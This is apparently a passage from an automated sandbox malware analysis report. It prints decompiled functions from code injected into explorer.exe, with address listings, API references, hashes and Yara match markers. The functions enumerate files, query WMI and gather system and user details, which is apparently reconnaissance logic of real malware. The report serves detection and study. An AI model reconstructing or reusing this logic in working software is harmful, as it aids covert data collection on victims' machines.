							E032E8D86( &_v12, 0xfffffffe);
						}
						goto L12;
					}
					_t61 = 0;
					do {
						_t7 = _t61 + 0x32ff9ec; // 0x0
						_push( *_t7);
						_push( &(_v608.cFileName));
						_t41 =  *0x32ff8ec; // 0x52ef998
						if( *((intOrPtr*)(_t41 + 0x18))() == 0) {
							goto L8;
						}
						_t45 = E032F0197(_t75, _t48,  &_v608, _a16);
						_t63 = _t63 + 0xc;
						if(_t45 == 0) {
							break;
						}
						_t46 =  *0x32ff8e0; // 0x52ef6c8
						 *((intOrPtr*)(_t46 + 0xc0))(1);
						L8:
						_t61 = _t61 + 4;
					} while (_t61 < 4);
					if((_v608.dwFileAttributes & 0x00000010) == 0) {
						goto L12;
					}
					goto L10;
					L12:
				} while (FindNextFileW(_t59,  &_v608) != 0);
				_t31 =  *0x32ff8e0; // 0x52ef6c8
				 *((intOrPtr*)(_t31 + 0x80))(_t59);
				goto L14;
			}



















                                                                                                            0x032ec134
                                                                                                            0x032ec140
                                                                                                            0x032ec142
                                                                                                            0x032ec144
                                                                                                            0x032ec14a
                                                                                                            0x032ec14f
                                                                                                            0x032ec152
                                                                                                            0x032ec157
                                                                                                            0x032ec273
                                                                                                            0x032ec273
                                                                                                            0x032ec16b
                                                                                                            0x032ec170
                                                                                                            0x032ec262
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ec176
                                                                                                            0x032ec176
                                                                                                            0x032ec183
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ec191
                                                                                                            0x032ec1e4
                                                                                                            0x032ec1e4
                                                                                                            0x032ec1ec
                                                                                                            0x032ec1ed
                                                                                                            0x032ec1f8
                                                                                                            0x032ec1fa
                                                                                                            0x032ec1fd
                                                                                                            0x032ec202
                                                                                                            0x032ec204
                                                                                                            0x032ec20c
                                                                                                            0x032ec212
                                                                                                            0x032ec214
                                                                                                            0x032ec216
                                                                                                            0x032ec22b
                                                                                                            0x032ec230
                                                                                                            0x032ec239
                                                                                                            0x032ec23f
                                                                                                            0x00000000
                                                                                                            0x032ec202
                                                                                                            0x032ec193
                                                                                                            0x032ec195
                                                                                                            0x032ec195
                                                                                                            0x032ec195
                                                                                                            0x032ec1a1
                                                                                                            0x032ec1a2
                                                                                                            0x032ec1ac
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ec1b9
                                                                                                            0x032ec1be
                                                                                                            0x032ec1c3
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ec1c5
                                                                                                            0x032ec1cc
                                                                                                            0x032ec1d2
                                                                                                            0x032ec1d2
                                                                                                            0x032ec1d5
                                                                                                            0x032ec1e2
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032ec240
                                                                                                            0x032ec24e
                                                                                                            0x032ec256
                                                                                                            0x032ec25c
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,00000000,00000000), ref: 032EC165
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 032EC248
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 1690352074-0
                                                                                                            • Opcode ID: 8b459bfb988cbd1a48a314ac298447e85faf57df63dd074ff7b9dda66f830024
                                                                                                            • Instruction ID: 6b7b348922c0cd02e6f57cf4f1b6a498a119e9448f92548226764533805f5ffb
                                                                                                            • Opcode Fuzzy Hash: 8b459bfb988cbd1a48a314ac298447e85faf57df63dd074ff7b9dda66f830024
                                                                                                            • Instruction Fuzzy Hash: 3331A775A102256FDB10EBE4DC8EFAA776CEB00B60F4441A4F915EA1C1F67199C4CB64
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EA202 Relevance: 1.5, APIs: 1, Instructions: 24timeCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,032E51C8,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 032EA20F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Time$FileSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 2086374402-0
                                                                                                            • Opcode ID: 17edaeb87e5e04832c74df5f0f2e51612374ba5863030131931917f577c5c896
                                                                                                            • Instruction ID: 86b1909eca353c5301dc78dafe1edd0b84685c00b5b385d32cc7d930d1030d76
                                                                                                            • Opcode Fuzzy Hash: 17edaeb87e5e04832c74df5f0f2e51612374ba5863030131931917f577c5c896
                                                                                                            • Instruction Fuzzy Hash: ACE048769003147FDB10EE689D05B5AF7BDEB80610F5585559C42F7344E570AA448691
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EEB47 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 50%
                                                                                                            			E032EEB47(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E032EE503(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E032E8D70(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E032E8D86( &_v60, 0xfffffffe);
					E032EE5B7( &_v104);
					return _t320;
				}
				_t165 = E032E9F8F(_t255, 0x30f);
				 *_t328 = 0x2ad;
				_v52 = _t165;
				_t166 = E032E9F8F(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E032E9BF7(_t165);
				_v60 = _t322;
				E032E8D41( &_v52);
				E032E8D41( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E032E9F8F(_t255, 0x103e);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E032E8D41( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E032E8D86( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E032E9A5A(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E032E9A5A(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E032E8E04(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E032E8D70( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E032E8D86(_t136, 0);
								E032E8D86( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E032E9A5A(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E032E9F8F(_t281, 0x3f4);
								 *_t329 = 0x1b4;
								_t217 = E032E9F8F(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E032E8D70(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E032E8D41( &_v92);
											E032E8D41( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E032E9FEE();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E032E8D70(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E032E9F8F(_t283, 0x12c);
										E032E9FEE( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E032E8D41( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E032E9A5A(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E032EEA2B( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E032E8D86( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                            0x032eeb50
                                                                                                            0x032eeb56
                                                                                                            0x032eeb5d
                                                                                                            0x032eeb60
                                                                                                            0x032eeb63
                                                                                                            0x032eeb68
                                                                                                            0x032eeb6a
                                                                                                            0x032eeb6f
                                                                                                            0x032eefb7
                                                                                                            0x032eefb7
                                                                                                            0x032eeb7c
                                                                                                            0x032eeb7e
                                                                                                            0x032eeb81
                                                                                                            0x032eeb84
                                                                                                            0x032eef9c
                                                                                                            0x032eefa2
                                                                                                            0x032eefac
                                                                                                            0x00000000
                                                                                                            0x032eefb1
                                                                                                            0x032eeb8f
                                                                                                            0x032eeb96
                                                                                                            0x032eeb9d
                                                                                                            0x032eeba0
                                                                                                            0x032eeba5
                                                                                                            0x032eeba7
                                                                                                            0x032eebaa
                                                                                                            0x032eebad
                                                                                                            0x032eebae
                                                                                                            0x032eebb7
                                                                                                            0x032eebbd
                                                                                                            0x032eebc0
                                                                                                            0x032eebc9
                                                                                                            0x032eebce
                                                                                                            0x032eebd3
                                                                                                            0x032eebea
                                                                                                            0x032eebf7
                                                                                                            0x032eebfa
                                                                                                            0x032eec01
                                                                                                            0x032eec06
                                                                                                            0x032eec0d
                                                                                                            0x032eec12
                                                                                                            0x032eec19
                                                                                                            0x032eec1b
                                                                                                            0x032eec27
                                                                                                            0x032eec2a
                                                                                                            0x032eec2c
                                                                                                            0x032eef8c
                                                                                                            0x032eef8d
                                                                                                            0x032eef96
                                                                                                            0x00000000
                                                                                                            0x032eef96
                                                                                                            0x032eec32
                                                                                                            0x032eec35
                                                                                                            0x032eec38
                                                                                                            0x032eec3b
                                                                                                            0x032eec3d
                                                                                                            0x032eef58
                                                                                                            0x032eef5b
                                                                                                            0x032eef5e
                                                                                                            0x032eef60
                                                                                                            0x032eef82
                                                                                                            0x032eef87
                                                                                                            0x032eef62
                                                                                                            0x032eef65
                                                                                                            0x032eef70
                                                                                                            0x032eef77
                                                                                                            0x032eef77
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eec43
                                                                                                            0x032eec43
                                                                                                            0x032eec55
                                                                                                            0x032eec58
                                                                                                            0x032eec5a
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eec62
                                                                                                            0x032eec65
                                                                                                            0x032eec68
                                                                                                            0x032eec6b
                                                                                                            0x032eec6e
                                                                                                            0x032eec71
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eec77
                                                                                                            0x032eec85
                                                                                                            0x032eec88
                                                                                                            0x032eec8a
                                                                                                            0x032eeca3
                                                                                                            0x032eecb2
                                                                                                            0x032eecba
                                                                                                            0x032eecba
                                                                                                            0x032eecbd
                                                                                                            0x032eecc4
                                                                                                            0x032eecc8
                                                                                                            0x032eecce
                                                                                                            0x032eecd0
                                                                                                            0x032eef40
                                                                                                            0x032eef46
                                                                                                            0x032eef4c
                                                                                                            0x032eef4f
                                                                                                            0x032eef4f
                                                                                                            0x00000000
                                                                                                            0x032eef4f
                                                                                                            0x032eecdf
                                                                                                            0x032eecf3
                                                                                                            0x032eecf7
                                                                                                            0x032eecf9
                                                                                                            0x032eecfe
                                                                                                            0x032eef0d
                                                                                                            0x032eef13
                                                                                                            0x032eef1e
                                                                                                            0x032eef29
                                                                                                            0x032eef2f
                                                                                                            0x032eef35
                                                                                                            0x032eef38
                                                                                                            0x00000000
                                                                                                            0x032eef38
                                                                                                            0x032eed04
                                                                                                            0x032eeedb
                                                                                                            0x032eeedb
                                                                                                            0x032eeede
                                                                                                            0x032eeee1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eed0c
                                                                                                            0x032eed14
                                                                                                            0x032eed1b
                                                                                                            0x032eed21
                                                                                                            0x032eed23
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eed2c
                                                                                                            0x032eed41
                                                                                                            0x032eed47
                                                                                                            0x032eed50
                                                                                                            0x032eed53
                                                                                                            0x032eed56
                                                                                                            0x032eed58
                                                                                                            0x032eeece
                                                                                                            0x032eeed1
                                                                                                            0x032eeeda
                                                                                                            0x032eeeda
                                                                                                            0x00000000
                                                                                                            0x032eeeda
                                                                                                            0x032eed68
                                                                                                            0x032eed6b
                                                                                                            0x032eed72
                                                                                                            0x032eed78
                                                                                                            0x032eed7b
                                                                                                            0x032eed7e
                                                                                                            0x032eed81
                                                                                                            0x032eed84
                                                                                                            0x032eedc0
                                                                                                            0x032eedc0
                                                                                                            0x032eedc3
                                                                                                            0x032eee6f
                                                                                                            0x032eee83
                                                                                                            0x032eee93
                                                                                                            0x032eee97
                                                                                                            0x032eee99
                                                                                                            0x032eeeb0
                                                                                                            0x032eeeb4
                                                                                                            0x032eeebd
                                                                                                            0x032eeec8
                                                                                                            0x00000000
                                                                                                            0x032eeec8
                                                                                                            0x032eee9f
                                                                                                            0x032eeea0
                                                                                                            0x032eeea5
                                                                                                            0x032eeea5
                                                                                                            0x032eeea7
                                                                                                            0x032eeea8
                                                                                                            0x032eeead
                                                                                                            0x00000000
                                                                                                            0x032eeead
                                                                                                            0x032eedc9
                                                                                                            0x032eedc9
                                                                                                            0x032eedcc
                                                                                                            0x032eee37
                                                                                                            0x032eee4b
                                                                                                            0x032eee5b
                                                                                                            0x032eee5f
                                                                                                            0x032eee61
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eee67
                                                                                                            0x032eee68
                                                                                                            0x00000000
                                                                                                            0x032eee68
                                                                                                            0x032eedce
                                                                                                            0x032eedce
                                                                                                            0x032eedd1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eedd3
                                                                                                            0x032eedd6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eedd8
                                                                                                            0x032eedd8
                                                                                                            0x032eedde
                                                                                                            0x032eedfa
                                                                                                            0x032eee09
                                                                                                            0x032eee12
                                                                                                            0x032eee17
                                                                                                            0x032eee1a
                                                                                                            0x032eee20
                                                                                                            0x032eee20
                                                                                                            0x032eee25
                                                                                                            0x032eee31
                                                                                                            0x00000000
                                                                                                            0x032eee31
                                                                                                            0x032eede3
                                                                                                            0x00000000
                                                                                                            0x032eede3
                                                                                                            0x032eed86
                                                                                                            0x032eedad
                                                                                                            0x032eedb2
                                                                                                            0x032eedb7
                                                                                                            0x032eedb9
                                                                                                            0x032eedb9
                                                                                                            0x00000000
                                                                                                            0x032eedb7
                                                                                                            0x032eed88
                                                                                                            0x032eed88
                                                                                                            0x032eed8b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eed91
                                                                                                            0x032eed91
                                                                                                            0x032eed94
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eed9a
                                                                                                            0x032eed9a
                                                                                                            0x032eed9d
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eeda3
                                                                                                            0x032eeda6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eeda8
                                                                                                            0x00000000
                                                                                                            0x032eeda8
                                                                                                            0x032eeeea
                                                                                                            0x032eeef0
                                                                                                            0x032eeef6
                                                                                                            0x032eeef9
                                                                                                            0x032eeefc
                                                                                                            0x032eeefc
                                                                                                            0x032eeeff
                                                                                                            0x032eef00
                                                                                                            0x032eef03
                                                                                                            0x032eef05
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032eef55
                                                                                                            0x032eef55
                                                                                                            0x00000000
                                                                                                            0x032eef55
                                                                                                            0x032eec8c
                                                                                                            0x032eec92
                                                                                                            0x00000000
                                                                                                            0x032eec92
                                                                                                            0x032eef52
                                                                                                            0x00000000
                                                                                                            0x032eebd5
                                                                                                            0x032eebda
                                                                                                            0x032eebdf
                                                                                                            0x00000000
                                                                                                            0x032eebe3

                                                                                                            APIs
                                                                                                              • Part of subcall function 032EE503: CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE516
                                                                                                              • Part of subcall function 032EE503: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE527
                                                                                                              • Part of subcall function 032EE503: CoCreateInstance.OLE32(032FC8A0,00000000,00000001,032FC8B0,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE53E
                                                                                                              • Part of subcall function 032EE503: SysAllocString.OLEAUT32(00000000), ref: 032EE549
                                                                                                              • Part of subcall function 032EE503: CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE574
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EEBF0
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EEC04
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EEF8D
                                                                                                            • SysFreeString.OLEAUT32(?), ref: 032EEF96
                                                                                                              • Part of subcall function 032E8D86: RtlFreeHeap.NTDLL(00000000,00000000), ref: 032E8DCC
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: String$AllocFree$HeapInitialize$AllocateBlanketCreateInstanceProxySecurity
                                                                                                            • String ID: FALSE$TRUE
                                                                                                            • API String ID: 1290676130-1412513891
                                                                                                            • Opcode ID: 3792d26281ea845996512fa34bffe595c0f7b2858296b5f0024fed7f22200f6a
                                                                                                            • Instruction ID: da1e39da99162b1fee6e43e7448182776a40e47ceffc8212f7b1f783b3e0a6c0
                                                                                                            • Opcode Fuzzy Hash: 3792d26281ea845996512fa34bffe595c0f7b2858296b5f0024fed7f22200f6a
                                                                                                            • Instruction Fuzzy Hash: 04E19175E10219AFCB14EFE4C899EEEBBB9FF48310F544059E505EB284DB71A981CB90
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EE040 Relevance: 16.0, APIs: 4, Strings: 5, Instructions: 250COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032EE040(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t87;
				intOrPtr _t89;
				void* _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x32ff8f8; // 0x32e0000
				_t68 = E032E8D70(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x32ff8e0; // 0x52ef6c8
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E032F35C6( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x32ff8e0; // 0x52ef6c8
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E032E9790(_t194, _t207);
					}
					_t75 =  *0x32ff8e0; // 0x52ef6c8
					_t77 = E032ECA1B( *((intOrPtr*)(_t75 + 0x12c))());
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E032ECB96( *_t77) == 0) {
						_t79 = E032ECA6B(_t159, _t194);
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220
					 *((intOrPtr*)(_t192 + 0x218)) = E032EF420(_t14);
					 *((intOrPtr*)(_t192 + 0x21c)) = E032EF3E5(_t14);
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x32ff8e8; // 0x52ef8b8
					_push(0);
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t89 =  *0x32ff8f0; // 0x52ef838
					_t90 =  *((intOrPtr*)(_t89 + 0x3c))(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E032EE039(_t149);
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E032E9790(_t149, _t211);
					}
					_t92 = E032EC86B();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E032EC65E(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E032E9B7C(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E032E97AA(_t149, _t36);
					_t97 = E032EE3C8(_t196, E032EA5DA(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E032EC881(_t97, _t37, _t216);
					_t99 =  *0x32ff8e0; // 0x52ef6c8
					 *((intOrPtr*)(_t192 + 0x101c)) = E032ECBE8( *((intOrPtr*)(_t99 + 0x12c))(_t195));
					E032E8F0A(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E032EDE3C(_t100);
					_t106 = E032EDE65(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E032E9F8F(_t105, 0x7c4);
